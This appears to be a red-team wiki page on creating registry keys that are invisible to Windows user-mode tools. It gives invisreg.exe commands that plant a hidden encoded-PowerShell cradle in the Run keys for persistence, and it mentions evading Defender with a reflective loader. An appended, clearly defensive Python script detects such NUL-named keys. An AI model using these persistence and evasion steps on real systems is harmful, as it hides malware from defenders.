Invisible Registry Keys


It's possible to craft invisible registry keys that the Windows NT kernel can read but user-mode applications cannot. This allows for some unique persistence cases that are hard to detect from the defender's perspective.


The target must be Windows, and you must run this tool with the access rights required for the hive you're writing to: HKLM requires Administrator/SYSTEM privileges, while HKCU can be modified by the current user.


This setup requires downloading and executing the following utility; Defender may or may not catch this file on disk. A reflective PE loader can potentially be used to avoid this issue. The executable in question can be found at this repo. Go to Releases and download the latest executable; compilation is not required.


Method 1 - invisreg.exe

Running invisreg.exe without any options will provide the following output:

Usage: invisreg [operation] [path] [type] [value]
         create - Create a new invisible registry key
         edit   - Edit an existing invisible registry key
         delete - Delete an existing invisible registry key
         query  - Query an invisible registry key
         Like this - HKLM:\PATH\TO\KEY
         supported hives:
           HKLM        - HKEY_LOCAL_MACHINE
           HKCR        - HKEY_CLASSES_ROOT
           HKCC        - HKEY_CURRENT_CONFIG
           HKU         - HKEY_USERS
         REG_SZ        - Value is expected to be a string
         REG_DWORD     - Value is expected to be a 32-bit integer
         REG_QWORD     - Value is expected to be a 64-bit integer
         REG_BINARY    - Value is expected to be the name of a file

       invisreg create HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName REG_SZ "calc.exe"
       invisreg edit HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName REG_DWORD 1337
       invisreg delete HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName
       invisreg query HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\KeyName

To install a PowerShell cradle into the Run key for persistence, the following command can be used:

.\invisreg.exe create HKLM:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\Cradle REG_SZ "powershell -enc <base64>"

Or for a specific user:

.\invisreg.exe create HKCU:\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\Cradle REG_SZ "powershell -enc <base64>"
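The following Python script is an added detection example; it is not part of this page and not code from the invisreg project. It assumes that invisreg, like earlier tools in this class, hides entries by giving them names that contain embedded NUL characters (an assumption; the page does not describe the mechanism): Win32 registry functions, regedit, reg.exe and the PowerShell registry provider treat a name as NUL-terminated, while the kernel and ntdll's Nt* calls use counted UNICODE_STRINGs, so such names are readable through the native API but appear empty, truncated or unopenable to ordinary tools. The script enumerates the HKLM Run key named on the page through NtEnumerateKey/NtEnumerateValueKey and flags any name that would be misread by a Win32 caller. The constants, structure layouts and buffer offsets are the documented ones from the Windows SDK; the `HKLM_RUN` native path is the page's target key. The name check itself is portable; the enumeration part requires Windows.

```python
"""Find registry key/value names that Win32 tools will misrepresent.

Win32 registry functions treat a name as a NUL-terminated string, while the
kernel and ntdll use counted UNICODE_STRINGs.  A name with an embedded NUL can
therefore be created and read through Nt* calls but appears empty, truncated,
or unopenable to Win32 callers.  suspicious_name()/scan_names() are pure
Python; native_names() needs Windows (it loads ntdll).
"""
import ctypes
import sys
from typing import Iterable, List, Optional, Tuple

# Documented values from the Windows SDK / ntdef.h.
KEY_READ = 0x20019
OBJ_CASE_INSENSITIVE = 0x40
STATUS_NO_MORE_ENTRIES = 0x8000001A
# Native (object manager) path of the Run key the page writes to.
HKLM_RUN = r"\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"


def suspicious_name(name: str) -> Optional[str]:
    """Explain why Win32 callers would misread `name`, or return None."""
    idx = name.find("\x00")
    if idx < 0:
        return None
    if idx == 0:
        return "leading NUL: Win32 APIs see an empty name (shown as the default value)"
    return f"NUL at offset {idx}: Win32 APIs see only {name[:idx]!r}"


def scan_names(entries: Iterable[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Reduce (kind, name) pairs to the ones a Win32 view would hide or truncate."""
    hits = []
    for kind, name in entries:
        reason = suspicious_name(name)
        if reason is not None:
            hits.append((kind, name, reason))
    return hits


class UNICODE_STRING(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),          # bytes, excluding any terminator
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_wchar_p)]


class OBJECT_ATTRIBUTES(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint32),
                ("RootDirectory", ctypes.c_void_p),
                ("ObjectName", ctypes.POINTER(UNICODE_STRING)),
                ("Attributes", ctypes.c_uint32),
                ("SecurityDescriptor", ctypes.c_void_p),
                ("SecurityQualityOfService", ctypes.c_void_p)]


def native_names(native_path: str) -> List[Tuple[str, str]]:
    """Enumerate subkey and value names of `native_path` through ntdll (Windows only).

    Information class 0 is KeyBasicInformation for keys and KeyValueBasicInformation
    for values.  NameLength/Name sit at byte offsets 12/16 in KEY_BASIC_INFORMATION
    and 8/12 in KEY_VALUE_BASIC_INFORMATION; NameLength is a byte count, so the
    decoded name keeps any embedded NULs instead of stopping at the first one.
    """
    ntdll = ctypes.WinDLL("ntdll")
    for fn in (ntdll.NtOpenKey, ntdll.NtEnumerateKey, ntdll.NtEnumerateValueKey, ntdll.NtClose):
        fn.restype = ctypes.c_uint32                    # NTSTATUS, compared as unsigned
    ustr = UNICODE_STRING(len(native_path) * 2, (len(native_path) + 1) * 2, native_path)
    attrs = OBJECT_ATTRIBUTES(ctypes.sizeof(OBJECT_ATTRIBUTES), None, ctypes.pointer(ustr),
                              OBJ_CASE_INSENSITIVE, None, None)
    handle = ctypes.c_void_p()
    status = ntdll.NtOpenKey(ctypes.byref(handle), KEY_READ, ctypes.byref(attrs))
    if status != 0:
        raise OSError(f"NtOpenKey({native_path}) failed: {status:#010x}")
    buf = ctypes.create_string_buffer(64 * 1024)
    found: List[Tuple[str, str]] = []
    try:
        for fn, kind, len_off, name_off in ((ntdll.NtEnumerateKey, "key", 12, 16),
                                            (ntdll.NtEnumerateValueKey, "value", 8, 12)):
            index = 0
            while True:
                needed = ctypes.c_uint32(0)
                status = fn(handle, index, 0, buf, ctypes.sizeof(buf), ctypes.byref(needed))
                if status == STATUS_NO_MORE_ENTRIES:
                    break
                if status != 0:
                    raise OSError(f"{kind} enumeration failed: {status:#010x}")
                nlen = int.from_bytes(buf.raw[len_off:len_off + 4], "little")
                found.append((kind, buf.raw[name_off:name_off + nlen].decode("utf-16-le")))
                index += 1
    finally:
        ntdll.NtClose(handle)
    return found


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("native enumeration needs Windows; scan_names() itself is portable")
    for kind, name, reason in scan_names(native_names(HKLM_RUN)):
        print(f"[{kind}] {name!r}: {reason}")
```

Run it elevated on the host being examined; for a per-user Run key, replace `HKLM_RUN` with the user's hive under `\Registry\User\<SID>\...`. A second useful signal, not implemented here, is a count mismatch between what `winreg` (the Win32 view) and `native_names()` report for the same key.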

Indicators of Compromise